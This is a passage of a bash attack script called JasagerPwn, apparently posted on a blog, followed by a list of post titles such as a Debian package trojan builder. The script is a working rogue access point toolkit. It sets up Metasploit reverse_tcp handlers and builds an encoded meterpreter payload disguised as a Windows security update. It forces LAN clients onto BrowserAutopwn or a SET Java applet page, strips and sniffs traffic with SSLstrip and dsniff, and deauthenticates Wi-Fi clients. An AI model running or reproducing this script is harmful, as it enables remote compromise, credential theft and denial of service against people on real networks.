set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $fonIP

set SRVPORT 80

set SRVHOST $fonIP

set URIPATH /

set ExitOnSession false

run -j” > /tmp/msfrcBP

#Metasploit rc no auto script FakeUpdate

if [ -e “/tmp/msfrcFU” ] ; then rm “/tmp/msfrcFU” ; fi

echo -e “use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST $fonIP

set LPORT $winPORT

set ExitOnSession false

exploit -j

set PAYLOAD osx/x86/shell_reverse_tcp

set LHOST 0.0.0.0

set LPORT $osxPORT

set ExitOnSession false

exploit -j

set PAYLOAD linux/x86/shell/reverse_tcp

set LHOST 0.0.0.0

set LPORT $nixPORT

set ExitOnSession false

exploit -j” > /tmp/msfrcFU

fi

sleep 1 && echo -e “\e[01;32m[>]\e[00m Enabling ipv4 Forwarding…”

xterm -geometry 0x0+0+0 -e “modprobe tun” &

echo “1” > /proc/sys/net/ipv4/ip_forward

#tail messages for DHCP info

xterm -geometry 75x16+0+509 -bg black -fg red -T “[JasagerPwn-DHCP] v$version” -e “tail -f /var/log/messages | grep DHCP” &

messageID=`echo $!`

echo -e “\e[01;32m[>]\e[00m Starting up DHCP3…”

xterm -geometry 75x9+0+474 -bg black -fg green -T “Starting DHCP3 Server” -e “/etc/init.d/dhcp3-server start” &

echo -e “\e[01;32m[>]\e[00m Loading URL Snarf/Driftnet…”

xterm -geometry 0x0+0+0 -e “driftnet -v -s -i $FONIFACE” &

xterm -geometry 75x24+464+405 -bg black -fg green -T “[JasagerPwn-DSniff] v$version” -e “dsniff -i $FONIFACE” &

dsniffID=`echo $!`

xterm -geometry 75x37+0+0 -bg black -fg green -T “[JasagerPwn-URLSnarf] v$version” -e “urlsnarf -i $FONIFACE” &

echo -e “\e[01;32m[>]\e[00m Setting up IP Tables…”

IPTABLES

echo -e “\e[01;36m[~]\e[00m leg3nd’s JasagerPwn v$version Rev$revision Started! More @ www.info-s3curity.com”

echo -e “\e[01;36m[~]\e[00m ALL Attacks are now operating system agnostic OSX/MS/Linux!!”

#MAIN OPTIONS FOR AP ATTACKS

while true

do

echo

echo

ifconfig $FONIFACE $fonIP

ourIP=`ifconfig $FONIFACE | awk ‘/inet addr/ {split ($2,A,”:”); print A[2]}’`

echo -e “\e[01;31m[+][————————————————————————————————-][+]\e[00m”

echo -e “\e[01;31m[+][==========================-Main Menu-============================][+]\e[00m”

echo -e “\e[01;31m[+][————————————————————————————————-][+]\e[00m”

#echo -e “\e[01;32m[!]\e[00m Press [S]niff, [F]akeUpdate, [D]eAuth, [B]rowserPwn, [J]ava Attack, e[X]it “

if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

echo -e “\e[01;36m [*] Attack Status: Idle..\e[00m”

elif [ $sniffing -eq 1 ]; then

echo -e “\e[01;31m [*] Attack Status: SSLstrip & Sniffing\e[00m”

elif [ $browserpwn -eq 1 ]; then

echo -e “\e[01;31m [*] Attack Status: MSF Browser-AutoPwn\e[00m”

elif [ $fakeupdate -eq 1 ]; then

echo -e “\e[01;31m [*] Attack Status: MSF Fake Update\e[00m”

elif [ $javaATK -eq 1 ]; then

echo -e “\e[01;31m [*] Attack Status: SET Java Applet\e[00m”

fi

echo -e “\e[01;32m[-]\e[00m [1][S] = Sniff The APs Network.”

echo -e “\e[01;32m[-]\e[00m [2][F] = Redirect LAN to Fake Security Update Page.”

echo -e “\e[01;32m[-]\e[00m [3][B] = Redirect LAN to Metasploit BrowserAutopwn.”

echo -e “\e[01;32m[-]\e[00m [4][J] = Redirect LAN to Java Applet Page.”

echo -e “\e[01;32m[-]\e[00m [5][D] = De-Authorize Clients on other APs.”

echo -e “\e[01;32m[-]\e[00m [6][N] = Adjust Script & Network Settings”

echo -e “\e[01;32m[-]\e[00m [7][X] = Exit JasagerPwn Script”

echo -n -e “\e[01;31m [?] Choose an attack for AP:\e[00m “

read -e CONFIRM3

echo

case $CONFIRM3 in

s|S|sniff|Sniff|1)

if [ $browserpwn -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with browserPwn. IPtables Conflict.”

elif [ $javaATK -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict.”

elif [ $fakeupdate -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. IPtables Conflict.”

elif [ $sniffing -eq 0 ]; then

iptables -t nat -A PREROUTING —in-interface $FONIFACE -p tcp —destination-port 80 -j REDIRECT —to-ports $sslport

xterm -geometry 75x3+1-25 -bg black -fg green -e “sslstrip -l $sslport && sleep 3” &

if [ -e sslstrip.log ]; then

xterm -geometry 75x24+464+65 -bg black -fg green -T “SSLStrip Sniffing” -e “tail -f sslstrip.log” &

TAILPID=`echo $!`

else

touch sslstrip.log

xterm -geometry 75x24+464+65 -bg black -fg green -T “SSLStrip Sniffing” -e “tail -f sslstrip.log” &

TAILPID=`echo $!`

fi

echo -e “\e[01;33m[!]\e[00m\e[00m Attack Started: SSLStripping / Sniffing”

wasSniffing=”1”

sniffing=”1”

elif [ $sniffing -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Your Already Sniffing!!”

fi

;;

F|f|fakeupdate|Fakeupdate|2)

if [ $fakeupdate -eq 1 ]; then

updateLoop

elif [ $browserpwn -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with BrowserPwn. Port conflict.”

elif [ $javaATK -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict.”

elif [ $fakeupdate -eq 0 ]; then

fakeupdate=”1”

if [ -e “$Fwww/ms/Windows-KB183905-x86-ENU.exe” ]; then rm -f “$Fwww/ms/Windows-KB183905-x86-ENU.exe”; fi

xterm -geometry 75x15+10+0 -bg black -fg green -T “[Metasploit Payload] v$version - Metasploit (Windows)” -e “msfpayload windows/meterpreter/reverse_tcp LHOST=$fonIP LPORT=$winPORT R | msfencode -x $SPWD/src/resources/NOTEPAD.EXE -t exe -e x86/shikata_ga_nai -c 10 -o $Fwww/ms/Windows-KB183905-x86-ENU.exe”

fakeupdate && updateLoop

fi

;;

B|b|browserpwn|browserPwn|3)

if [ $fakeupdate -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port conflict.”

elif [ $javaATK -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with Java Applet Attack. IPtables Conflict.”

elif [ $browserpwn -eq 0 ]; then

if [ $autoMetScript -eq 1 ]; then metScript; fi

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

xterm -geometry 75x5+0+94 -bg black -fg green -T “[JasagerPwn-Apache Kill] v$version - Stopping Apache2” -e “/etc/init.d/apache2 stop” &

xterm -geometry 110x42+464-38 -bg black -fg green -T “[Metasploit Handler] v$version” -e “msfconsole -r /tmp/msfrcBP” &

sleep 30 #Wait for browserAutopwn to start up modules and web server

echo -e “\e[01;33m[!]\e[00m Forcing LAN to visit our site…”

ipTableRedirect

xterm -geometry 75x7+0-36 -bg black -fg green -T “[JasagerPwn-DNS Spoof] v$version” -e “dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns” &

echo -e “\e[01;33m[!]\e[00m Starting Web Server browserPwn attack @ $fonIP:80…”

browserpwn=”1”

fi

while true

do

if [ $fakeupdate -eq 1 ]; then break; fi

if [ $javaATK -eq 1 ]; then break; fi

echo

echo -e “\e[01;33m[MODE][============-BrowserPwn Metasploit-==========][!]\e[00m”

echo -e -n “\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: “

read -e USR_CHOICE2

#read -r -p “[?] Enter [I] to give Internet back or [M] for Main Menu: ” USR_CHOICE2

case $USR_CHOICE2 in

S|s|Stop|stop|1)

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE”

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —jump REDIRECT”

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —proto tcp —jump DNAT —to $fonIP”

IPTABLES

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

xterm -geometry 75x5+0+94 -bg black -fg green -T “[JasagerPwn-Apache Kill] v$version - Stopping Apache2” -e “/etc/init.d/apache2 stop” &

browserpwn=”0”

sleep 2

if [ $wasSniffing != “0” ]; then sslstrip ; fi

echo -e “\e[01;33m[!]\e[00m Kill Metasploit Server Jobs if you use FakeUpdate!!”

echo -e “\e[01;33m[!]\e[00m Dont Forget To Run ‘ipconfig /flushdns’ On Victim!!”

break

;;

M|m|Menu|menu|2)

break

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

done

;;

J|j|java|Java|4)

SETcheck=`ps aux | grep “python ./set-automate” | grep -v grep | awk ‘{ print $2 }’`

if [ $browserpwn -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with browserPwn. Port Conflict.”

elif [ $fakeupdate -eq 1 ]; then

echo -e “\e[01;31m[!]\e[00m Error: Cant run with FakeUpdate. Port Conflict.”

elif [ $SETcheck ] && [ $javaATK -eq 0 ]; then

echo -e “\e[01;31m[!]\e[00m Error: You still have a SET window open.. Close it first or this will cause problems..”

elif [ $javaATK -eq 0 ] && [ ! $SETcheck ]; then

echo -n -e “\e[01;33m[!]\e[00m [1][G]oogle or [2][J]ava Required: ”

read -e JavaSite

case $JavaSite in

G|g|Google|google|1)

if [ $autoMetScript -eq 1 ]; then metScript; fi

javasite=”1”

JavaSite

xterm -geometry 75x8+100+0 -fg green -bg black -T “v$version - Starting Apache2” -e “/etc/init.d/apache2 restart”

service apache2 restart > /dev/null

sleep .5

xterm -geometry 75x8+100+0 -fg green -bg black -T “v$version - Starting Apache2” -e “ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite google && /etc/init.d/apache2 reload”

sleep .5

xterm -fg green -bg black -geometry 110x42+464-38 -T “[SET-JavaApplet] v$version - WebServer” -e “cd $SETpath && ./set-automate /tmp/auto-google2” &

;;

J|j|Java|java|2)

if [ $autoMetScript -eq 1 ]; then metScript; fi

javasite=”2” && sleep 1

JavaSite

xterm -geometry 75x8+100+0 -bg black -fg green -T “v$version - Starting Apache2” -e “/etc/init.d/apache2 restart”

service apache2 restart > /dev/null

sleep .5

xterm -geometry 75x8+100+0 -bg black -fg green -T “v$version - Starting Apache2” -e “ls /etc/apache2/sites-available/ | xargs a2dissite && a2ensite javapwn && /etc/init.d/apache2 reload”

sleep .5

xterm -fg green -bg black -geometry 110x42+464-38 -T “[SET-JavaApplet] v$version - WebServer” -e “cd $SETpath && ./set-automate /tmp/auto-java2” &

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

sleep 4

echo -n -e “\e[01;34m[*]\e[00m Press [ENTER] when SET is ready..”

read -e $blahblahblahnotused

echo -e “\e[01;33m[!]\e[00m Forcing LAN to visit our site…”

ipTableRedirect

if [ $autoMetScript -eq 1 ]; then metScript; fi

if [ -e “$SETpath/src/web_clone/site/template/index2.html” ] && [ ! -e “$SETpath/src/web_clone/site/template/index.html” ]; then

mv “$SETpath/src/web_clone/site/template/index2.html” “$SETpath/src/web_clone/site/template/index.html”

fi

if [ -e “/var/www/javapwn/index2.html” ] && [ ! -e “/var/www/javapwn/index.html” ]; then

mv “/var/www/javapwn/index2.html” “/var/www/javapwn/index.html”

fi

if [ -e “/var/www/javapwn/index1.html” ] && [ ! -e “/var/www/javapwn/index.html” ]; then

mv “/var/www/javapwn/index1.html” “/var/www/javapwn/index.html”

fi

xterm -geometry 75x7+0-36 -bg black -fg green -T “[JasagerPwn-Kill DNS] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof”

xterm -geometry 75x7+0-36 -bg black -fg green -T “[JasagerPwn-DNS Spoof] v$version - DNSSpoof” -e “dnsspoof -i $FONIFACE -f /tmp/jasagerpwn.dns” &

javaATK=”1”

fi

while true

do

if [ $SETcheck ] && [ $javaATK -eq 0 ]; then break; fi

if [ $browserpwn -eq 1 ]; then break; fi

if [ $fakeupdate -eq 1 ]; then break; fi

echo

echo -e “\e[01;33m[MODE][==========-Java Applet Attack SET-==========][!]\e[00m”

echo -e -n “\e[01;33m[!]\e[00m [S][1] to Stop Attack or [M][2] for Main Menu: “

read -e USR_CHOICE9

#read -r -p “[?] Enter [I] to give Internet back or [M] for Main Menu: ” USR_CHOICE9

case $USR_CHOICE9 in

S|s|Stop|stop|1)

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE”

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —jump REDIRECT”

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-IPTABLES] v$version” -e “iptables —table nat —delete PREROUTING —in-interface $FONIFACE —proto tcp —jump DNAT —to $fonIP”

IPTABLES

xterm -geometry 75x7+10+330 -bg black -fg green -T “[JasagerPwn-DNS Kill] v$version - Killing DNSSpoof” -e “killall -9 dnsspoof” &

xterm -geometry 75x5+0+94 -bg black -fg green -T “[JasagerPwn-Apache Kill] v$version - Stopping Apache2” -e “/etc/init.d/apache2 stop” &

javaATK=”0”

sleep 3

if [ $wasSniffing != “0” ]; then sslstrip ; fi

echo -e “\e[01;33m[!]\e[00m DONT FORGET TO RUN ‘ipconfig /flushdns’ ON VICTIM!!”

break

;;

M|m|Menu|menu|2)

break

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

done

;;

D|d|deauth|Deauth|DeAuth|5)

attackCheck=`ifconfig | grep $MIFACE | awk ‘{print $1}’ | cut -b 4`

while true

do

echo

echo -e “\e[01;33m[MODE][======================-DeAuth Attacks-=========================][!]\e[00m”

echo -e “\e[01;33m[!]\e[00m [1][A]irodrop-ng [2][D]eAuth Mass [3][S]ingle DeAuth”

echo -e “\e[01;33m[!]\e[00m [4][K]ill DeAuth [5][M]ain menu”

#read -r -p “[?] Please enter [ A | D | S | K | M ]: ” USR_CHOICE3

echo -e -n “\e[01;33m[!]\e[00m Choose From Above: “

read -e USR_CHOICE3

case $USR_CHOICE3 in

A|a|airodrop|Airodrop|1)

if [ -e “/usr/bin/airdrop-ng” ]; then

if [ -e “/tmp/cap-01.csv” ]; then rm /tmp/cap-* ; fi

sleep 2

xterm -geometry 90x30+464+0 -bg black -fg green -T “[JasagerPwn-Airodump] Capturing APs” -e “airodump-ng -w /tmp/cap -o csv $MIFACE” &

AIRDUMPID=`echo $!`

sleep 10

xterm -geometry 75x12+464+418 -bg black -fg green -hold -T “[JasagerPwn-Airdrop Attack] v$version” -e “airdrop-ng -b -i $MIFACE -r /tmp/deauth.conf -t /tmp/cap-01.csv” &

AIRDROPID=`echo $!`

else

echo

echo -e “\e[01;31m[!]\e[00m Error: You need to fully install airdrop-ng for this.”

echo -e “\e[01;31m[!]\e[00m Please go to /pentest/wireless/aircrack-ng/scripts/airdrop-ng and run install.py.”

fi

;;

D|d|deauth|DeAuth|2)

xterm -geometry 75x12+464+265 -bg black -fg green -T “[JasagerPwn-MassDeauth.sh] v$version” -e “chmod +x src/deauth.sh && bash src/deauth.sh” &

DEAUTHPID=`echo $!`

;;

S|s|single|Single|3)

xterm -geometry 75x12+464+288 -bg black -fg green -T “[JasagerPwn-DeAuth Kill] v$version” -e “killall -9 aireplay” &

xterm -geometry 95x47+577+0 -hold -bg black -fg green -T “[CLOSE MANUALLY] - Airodump Capture” -e “airodump-ng $MIFACE” &

airID=`echo $!`

echo

read -r -p “[?] Enter the target APs BSSID: ” TBSSID

kill $airID

read -r -p “[?] Do You want a specific client? [ Y | N ]: ” DMODE

case $DMODE in

y|Y|Yes|yes|1)

xterm -geometry 95x47+577+0 -hold -bg black -fg green -T “[CLOSE MANUALLY] - Airodump Capture” -e “airodump-ng —bssid $TBSSID $MIFACE” &

echo

read -r -p “[?] Enter the target Client MAC: ” CMAC

xterm -geometry 75x12+464+265 -bg black -fg green -T “[JasagerPwn-Manual DeAuth] v$version” -e “aireplay-ng -D -0 20 -a $TBSSID -c $CMAC $MIFACE” &

;;

n|N|No|no|2)

xterm -geometry 75x12+464+265 -bg black -fg green -T “[JasagerPwn-Manual DeAuth] v$version” -e “aireplay-ng -0 20 -D -a $TBSSID $MIFACE” &

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

;;

K|k|kill|Kill|4)

xterm -geometry 75x12+464+288 -bg black -fg green -T “[JasagerPwn-DeAuth Kill] v$version” -e “kill $DEAUTHPID && killall -9 aireplay-ng && killall airodump-ng && kill $AIRDROPID && kill $AIRDUMPID” &

xterm -geometry 75x12+464+288 -bg black -fg green -T “[JasagerPwn-DeAuth Kill] v$version” -e “kill $AIRDROPID && kill $AIRDUMPID && kill $airID” &

;;

M|m|menu|Menu|5)

break

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

done

;;

N|n|Network|network|net|6)

while true

do

echo

echo -e “\e[01;33m[MODE][=======================-Script Settings-=======================][!]\e[00m”

echo -e “\e[01;33m[!]\e[00m [1][I]nterface [2]DeAuth [C]onfig “

echo -e “\e[01;33m[!]\e[00m [3][R]efresh I-net [4][M]ain Menu”

echo -e -n “\e[01;33m[!]\e[00m Choose From Above: “

read -e USR_CHOICE99

case $USR_CHOICE99 in

I|i|interface|Interface|1)

read -r -p “[?] Using a WiFi Network (Adds DeAuth Rule) [ Y | N ]: ” USR_CHOICE98

case $USR_CHOICE98 in

y|Y|Yes|yes|1)

resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

xterm -geometry 75x12+464+288 -bg black -fg green -T “[ResolvLoop Kill] v$version” -e “killall -9 $dnsID2”

echo

read -p “[!] Connect to WiFi Network THEN Press [Enter] ..”

echo

echo -e “\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE”

read -r -p “[?] Please Enter the New Gateway Interface: “ NEWIFACE

IFACE=`echo $NEWIFACE`

if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

IPTABLES

elif [ $sniffing -eq 1 ] || [ $browserpwn -eq 1 ] || [ $fakeupdate -eq 1 ] || [ $javaATK -eq 1 ]; then

ipTableRedirect

fi

echo “while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &” > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

wifiMAC=`ifconfig $IFACE | grep “HWaddr” | awk ‘{print $5}’ | tr “[a-z]” “[A-Z]”`

newIFACEmac=`iwconfig $IFACE | grep “Access Point” | awk ‘{print $6}’`

echo “a/$newIFACEmac|$wifiMAC” » /tmp/deauth.conf

;;

n|N|No|no|2)

resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

xterm -geometry 75x12+464+288 -bg black -fg green -T “[ResolvLoop Kill] v$version” -e “killall $dnsID2”

echo

echo -e “\e[01;33m[!]\e[00m Current Gateway Interface = $IFACE”

read -r -p “[?] Please Enter the New Gateway Interface: “ NEWIFACE

IFACE=`echo $NEWIFACE`

if [ $sniffing -eq 0 ] && [ $browserpwn -eq 0 ] && [ $fakeupdate -eq 0 ] && [ $javaATK -eq 0 ]; then

IPTABLES

elif [ $sniffing -eq 1 ] || [ $browserpwn -eq 1 ] || [ $fakeupdate -eq 1 ] || [ $javaATK -eq 1 ]; then

ipTableRedirect

fi

echo “while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &” > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

dnsID2=`echo $!`

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

;;

C|c|deauth|DeAuth|config|Config|CONFIG|2)

xterm -geometry 95x47+577+0 -bg black -fg green -T “[EDITING] Airdrop DeAuth Config” -e “nano /tmp/deauth.conf”

echo

echo -e “\e[01;33m[!]\e[00m Go To DeAuth Menu, Kill it, and Restart Airdrop-ng to apply changes.”

;;

R|r|refresh|Refresh|3)

xterm -geometry 75x12+464+288 -bg black -fg green -T “[JasagerPwn-DeAuth Kill] v$version” -e “ifconfig $IFACE up && dhclient $IFACE”

sleep 3

gatewayIP=`route -n | awk ‘/^0.0.0.0/ {getline; print $2}’`

resolvIDs=`ps aux | grep “bash /tmp/resolv” | grep -v grep | awk ‘{ print $2 }’`

xterm -geometry 75x8+100+0 -T “JasagerPwn v$version - Killing DriftNET” -e “kill `echo $resolvIDs | awk ‘{ print $1 }’` ; kill `echo $resolvIDs | awk ‘{ print $2 }’` ; kill `echo $resolvIDs | awk ‘{ print $3 }’`” &

xterm -geometry 75x12+464+288 -bg black -fg green -T “[ResolvLoop Kill] v$version” -e “killall $dnsID2” &

#while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &> /dev/null &

echo “while true ; do echo “nameserver 4.2.2.2” > /etc/resolv.conf && sleep 30 ; done &” > /tmp/resolv.sh

chmod +x /tmp/resolv.sh

bash /tmp/resolv.sh &

dnsID2=`echo $!`

;;

M|m|menu|Menu|4)

break

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

done

;;

X|x|exit|Exit|7)

cleanup

;;

*) echo -e “\e[01;31m[!]\e[00m Error: Please Choose From The Menu..”

esac

done

cleanup

OPEXXX

Showing posts tagged bash

aikido bash script

LAK

bash script to generate a Debian (.deb) package trojan using Metasploit payload

FakeAP_pwn.sh

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp

F*ck MS Exploit Menu

Motioncity13’s Option Menu

JasagerPwn Attack